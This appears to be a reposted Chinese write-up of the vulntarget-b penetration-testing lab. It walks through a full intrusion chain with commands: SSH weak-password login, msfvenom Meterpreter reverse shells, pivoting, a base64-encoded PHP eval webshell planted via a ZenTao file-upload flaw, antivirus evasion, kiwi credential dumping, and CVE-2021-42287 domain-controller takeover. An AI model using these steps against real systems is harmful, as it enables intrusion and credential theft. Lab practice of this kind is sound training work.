vulntarget-b

在这里插入图片描述

实际部署之后centos7 的ip有所变动分别是 :192.168.127.130以及10.0.20.30

Centos7

老规矩还是先用fscan扫一下服务和端口,找漏洞打
在这里插入图片描述

直接爆出来一个SSH弱口令…,上来就不用打了,什么意思???
直接xshell登入,生成一个MSF木马,然后上线。

上线MSF

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.127.129 LPORT=8888 -f elf > mshell.elf
msfconsole
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost 192.168.127.129
set lport 8888
run

添加路由

run post/multi/manage/autoroute

看到另外一个网段

[!]  * incompatible session platform: linux
[*] Running module against localhost.localdomain
[*] Searching for subnets to autoroute.
[+] Route added to subnet 10.0.20.0/255.255.255.0 from host's routing table.
[+] Route added to subnet 192.168.127.0/255.255.255.0 from host's routing table.

上传Fscan

直接使用msf的命令即可上传

upload /root/home/tools/fscan /tmp/

然后执行shell命令,获取centos的shell,(你可能会说,都有密码了,直接连接不行吗?害,应急做多了,老是会想到,ssh有记录。)

/usr/bin/script -qc /bin/bash /dev/null   #获得交互式shell

然后执行,执行扫描的时候需要加上-np,因为win10的那一台机器开着防火墙,ping不通

cd /tmp
chmod +x fscan
./fscan -h 10.0.20.1/24  -np   

执行结果,我把不相关的直接删除了,看重点即可。

[root@localhost tmp]# ./fscan -h 10.0.20.1/24 -np___                              _    / _ \     ___  ___ _ __ __ _  ___| | __ / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <    
\____/     |___/\___|_|  \__,_|\___|_|\_\   fscan version: 1.8.3
start infoscan
10.0.20.66:3306 open
10.0.20.66:8080 open
[*] 扫描结束,耗时: 4m20.058335309s

发现内网有一个10.0.20.66并且开放了33068080端口,先看一下8080端口

WIN10

端口转发

将本地kali的8181端口转发给内网机器10.0.20.668080端口

portfwd add -l 8282 -p 8080 -r 10.0.20.66

这个时候直接访问kali的8282端口就能访问到10.0.20.668181端口了,主要是将centos给当跳板了。
访问了一下,发现是禅道CMS
在这里插入图片描述

账号和密码是弱口令: admin/Admin#123,看其他博主爆出来的,在后台可以看到版本信息,
在这里插入图片描述

这个版本存在一个漏洞:禅道 12.4.2 后台任意文件上传漏洞 CNVD-C-2020-121325,具体漏洞详情不多介绍,网上有很多例子。

禅道CMS

centos中创建一个php🐎

echo PD9waHAgQGV2YWwoJF9QT1NUWydiJ10pOz8+ | base64 -d >> shell.php

然后用python开启一个http服务,centos内置python为python2版本,使用下面命令开启,确保shell.php在执行命令的目录内

python -m SimpleHTTPServer 7777

构造参数

HTTP://10.0.20.30:7777/shell.php
base64加密一下
SFRUUDovLzEwLjAuMjAuMzA6Nzc3Ny9zaGVsbC5waHA=

最终的payload是

http://192.168.127.129:8282/index.php?m=client&f=download&version=1&link=SFRUUDovLzEwLjAuMjAuMzA6Nzc3Ny9zaGVsbC5waHA=

请求一下这个url,禅道会向刚刚开启的那个HTTP服务请求shell.php并且会保存到data\client\1目录中,所以🐎的地址为:http://192.168.127.129:8282/data/client/1/shell.php
连接成功,木马上线

在这里插入图片描述

MSF上线

生成一个反弹shell马,因为正向马过不去,关防火墙也没权限

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.0.20.30 lport=7656 -f exe >7656.exe

使用蚁剑上传,神奇的一幕出现了,上传上去立马就没了,排查一下进程

tasklist 

在这里插入图片描述

复制到进程识别工具中:https://tasklist.pdsec.top/
在这里插入图片描述

发现了火绒程序

免杀

这里直接使用掩日的免杀工具
在这里插入图片描述

这个使用起来特别简单,直接选择好MSF生成的🐎,然后点击生成就会生成一个绕过杀毒软件的木马
MSF启动监听,注意这个IP,不要再设置为kali的IP了

use exploit/multi/handler 
set payload windows/x64/meterpreter/reverse_tcp   
set lhost 10.0.20.30
set lport 7656
run

然后在蚁剑的终端中运行那个木马程序,上线( ̄︶ ̄)↗ 
在这里插入图片描述

再进行一个进程迁移

run post/windows/manage/migrate 

添加路由

run post/multi/manage/autoroute

发现一个10.0.10.0/255.255.255.0的网段
在这里插入图片描述

扫描内网

使用arp扫描一下10.0.10.0/255.255.255.0这个网段的主机

use post/windows/gather/arp_scanner
set rhosts 10.0.10.1-254
set session 3
run

在这一步发生了一件比较离谱的事情,每次扫描的时候,session都会掉
在这里插入图片描述

把火绒关了也是如此,所以我在想是不是有什么bug,于是我换了一种思路,直接上传一个fsca,然后用fscan扫,上传之前,我把火绒开启了,奇怪的是,火绒竟然没有杀掉,可能是规则库太老了。
老规矩还是加上-np参数

fscan.exe -h 10.0.10.1/24 -np

扫描结果

10.0.10.100:135 open
10.0.10.100:139 open
10.0.10.100:445 open

发现了一个10.0.10.100的主机,10.0.10.99是当前主机的IP,先进行一下主机信息收集吧

主机信息收集

通过ipconfig /all可以看到主DNS后缀,基本上可以判定当前主机为域用户
在这里插入图片描述

定位域控
直接使用nslookup解析域名,获得域控的IP,ip为10.0.10.100
在这里插入图片描述

抓取Hash

抓取Hash之前需要先提权一下,要不然抓不了

提权

直接使用MSF自带的功能即可

getsystem

在这里插入图片描述

抓取hash

load kiwi 
creds_all

没有抓取到明文hash
在这里插入图片描述

去cmd5里面解析一下NTLM
解密如下

win101 admin#123

域控

CVE-2021-42287

由于Active Directory没有对域中计算机与服务器账号进行验证,经过身份验证的攻击者利用该漏洞绕过完全限制,可将域中普通用户权限提升为域管理员权限并执行任意代码
我们在win10中已经拿到了域成员的账号和密码:win101/admin#123
POC: https://github.com/WazeHell/sam-the-admin.git

搭建代理

运行这个POC之前需要先搭建一个代理,要不然访问不到

use auxiliary/server/socks_proxy
run

然后进行漏洞利用

proxychains python3 sam_the_admin.py vulntarget.com/win101:'admin#123' -dc-ip 10.0.10.100 -shell

成功拿到域控的shell
在这里插入图片描述

思路

Centos没啥好说的,弱口令打的,Win10是禅道CMS打进去的,然后MSF上线,免杀用的是掩日的工具,添加路由,用CVE-2021-42287打的域控,脚本一把梭,妥妥的脚本小子一个了。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/386256.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

STM32--HAL库--定时器篇

一&#xff1a;如何配置定时器 打开对应工程串口配置好的工程&#xff08;上一篇博客&#xff09;做如下配置&#xff1a; 定时器的中断溢出时间计算公式是&#xff1a; 由图得T100*1000/100MHz 注&#xff1a;100MHz100000000 所以溢出时间等于1ms 关于上图4的自动重装…

【网络安全】文件上传黑白名单及数组绕过技巧

不安全的文件上传&#xff08;Unsafe FileUpload&#xff09; 不安全的文件上传是指Web应用程序在处理用户上传的文件时&#xff0c;没有采取足够的安全措施&#xff0c;导致攻击者可能利用这些漏洞上传恶意文件&#xff0c;进而对服务器或用户造成危害。 目录 一、文件上传…

Unity横板动作游戏 - 素材导入和整理

导入素材 编辑器布局 点击每个窗口右上角的三个点可以有更多的窗口选项。 在屏幕的右上角有一个菜单可以保存布局或读取已经报错的布局。 工具按钮 编辑器上的工具按钮在启动的时候是蓝色的&#xff0c;在不启动的时候是灰色的。 这个按钮将会决定场景中的物体是以锚点显示还…

Oracle配置TCPS加密协议测试

文章目录 一、环境信息二、配置过程1.创建证书2.监听配置2.1.配置sqlnet.ora2.2.配置listener.ora文件2.3.配置tnsnames.ora文件2.4.重载监听 3.数据库本地测试3.1. tcps登录测试3.2.日志监控 一、环境信息 操作系统&#xff1a;Linux 版本信息&#xff1a;Oracle 19c 参考文档…

EXCEL自动公式计算始终为0

如果你的数据单元格的左上角存在绿色的三角小箭头&#xff0c;那么就会造成这种问题&#xff1a; 你的数字是以文本形式存入的单元格 解决办法&#xff1a; 选中数据列&#xff0c;数据->分列 直接选择完成 此时就可以进行公式计算了

pytest结合allure-pytest插件生成测试报告

目录 一、安装allure-pytest插件 二、下载allure 三、生成allure报告 四、效果展示 一、安装allure-pytest插件 二、下载allure 下载之后解压&#xff0c;解压之后还要配置环境变量&#xff08;把allure目录下bin目录配置到系统变量的path路径&#xff09;&#xff0c;下…

企业化运维(8)Docker容器技术

###1.Docker介绍### 什么是Docker Docker 是一个开源的应用容器引擎&#xff0c;让开发者可以打包他们的应用以及依赖包到一个可移植的镜像中&#xff0c;然后发布到任何流行的 Linux或Windows 机器上&#xff0c;也可以实现虚拟化。容器是完全使用沙箱机制&#xff0c;相互之间…

2024后端开发面试题总结

一、前言 上一篇离职贴发布之后仿佛登上了热门&#xff0c;就连曾经阿里的师兄都看到了我的分享&#xff0c;这波流量真是受宠若惊&#xff01; 回到正题&#xff0c;文章火之后&#xff0c;一些同学急切想要让我分享一下面试内容&#xff0c;回忆了几个晚上顺便总结一下&#…

全栈嵌入式C++、STM32、Modbus、FreeRTOS和MQTT协议:工业物联网(IIoT)可视化系统设计思路(附部分代码解析)

项目概述 随着工业4.0时代的到来&#xff0c;工业物联网&#xff08;IIoT&#xff09;在提高生产效率、降低运营成本和实现智能制造方面得到了广泛应用。本项目旨在开发一个全面的工业物联网监控系统&#xff0c;能够实时监测设备的温度、压力、振动和电流等参数&#xff0c;并…

谷粒商城实战踩坑笔记-Service循环依赖

文章目录 1. 使用 Lazy 注解2. 使用 PostConstruct 注解3&#xff0c;补充循环依赖相关知识循环依赖的原因举例说明 4&#xff0c;Lazy 的工作原理 启动项目失败&#xff0c;原因是出现了循环依赖。 The dependencies of some of the beans in the application context form a …

PP 6 成本中心 活动类型 以及两者的关联

成本中心创建&#xff1a;KS01 保存即可 活动类型&#xff1a;KL01 &#xff08;有准备&#xff0c;机器&#xff0c;工时等&#xff09; 保存 KP26:活动类型和成本中心的关联

如何在Net8.0平台下开发AOT项目,项目实战分析

1. 前言 前面的文章我们讨论过什么是AOT&#xff0c;以及AOT适用于什么场景&#xff0c; dotnet开发编译之争&#xff1a;Ahead-of-Time(AOT) vs Just-in-Time(JIT)谁才是未来最佳编译选择&#xff1f;&#xff0c;那么如何在Net8.0平台下开发AOT项目。 2. 先决条件 在安装的…

搞懂数据结构与Java实现

文章链接&#xff1a;搞懂数据结构与Java实现 (qq.com) 代码链接&#xff1a; Java实现数组模拟循环队列代码 (qq.com) Java实现数组模拟栈代码 (qq.com) Java实现链表代码 (qq.com) Java实现哈希表代码 (qq.com) Java实现二叉树代码 (qq.com) Java实现图代码 (qq.com)

【讲解下ECMAScript和JavaScript之间有何区别?】

&#x1f308;个人主页: 程序员不想敲代码啊 &#x1f3c6;CSDN优质创作者&#xff0c;CSDN实力新星&#xff0c;CSDN博客专家 &#x1f44d;点赞⭐评论⭐收藏 &#x1f91d;希望本文对您有所裨益&#xff0c;如有不足之处&#xff0c;欢迎在评论区提出指正&#xff0c;让我们共…

swagger-ui.html报错404

问题1&#xff1a;权限受限无法访问 由于采用的Shiro安全框架&#xff0c;需要在配置类ShiroConfig下的Shiro 的过滤器链放行该页面&#xff1a;【添加&#xff1a;filterChainDefinitionMap.put("/swagger-ui.html", "anon");】 public ShiroFilterFact…

C# dataGridView 去掉左边多出来空列

1.问题 在使用winform做界面程序时&#xff0c;dataGridView控件创建好后&#xff0c;左侧会多出一列为空&#xff0c;如何删除呢 2.解决方法 你可以在属性窗口中进行设置 如图&#xff1a; 将RowHeadersVisible 属性设置为False 或者代码设置 this.dataGridView1.RowHea…

算力共享:如何理解、标识与调控多层次算力资源的异构性和复杂性,实现智能算力网生态诸要素有效互操作?

目录 鹏程云主机和NPU计算服务器关系 NPU计算服务器 两者关系 结论 两种不同类型的处理器或计算单元 FPGA MLU NS3(Network Simulator version 3) 一、基本属性 二、主要功能与特点 三、应用与前景 对象存储和HDD存储 一、定义与特点 二、应用场景 三、总结 对…

基于深度学习网络的USB摄像头实时视频采集与水果识别matlab仿真

目录 1.算法运行效果图预览 2.算法运行软件版本 3.部分核心程序 4.算法理论概述 5.算法完整程序工程 1.算法运行效果图预览 (完整程序运行后无水印) 将usb摄像头对准一个播放不同水果图片的显示器&#xff0c;然后进行识别&#xff0c;识别结果如下&#xff1a; 本课题中…

【2025留学】德国留学真的很难毕业吗?为什么大家不来德国留学?

大家好&#xff01;我是德国Viviane&#xff0c;一句话讲自己的背景&#xff1a;本科211&#xff0c;硕士在德国读的电子信息工程。 之前网上一句热梗&#xff1a;“德国留学三年将是你人生五年中最难忘的七年。”确实&#xff0c;德国大学的宽进严出机制&#xff0c;延毕、休…

PHP多场地预定小程序系统源码

一键畅游多地&#xff01;多场地预定小程序的超实用指南 段落一&#xff1a;【开篇&#xff1a;告别繁琐&#xff0c;预订新体验】 &#x1f389;&#x1f680; 还在为多个活动或会议的场地预订而头疼不已吗&#xff1f;多场地预定小程序来拯救你啦&#xff01;它像是一位贴心…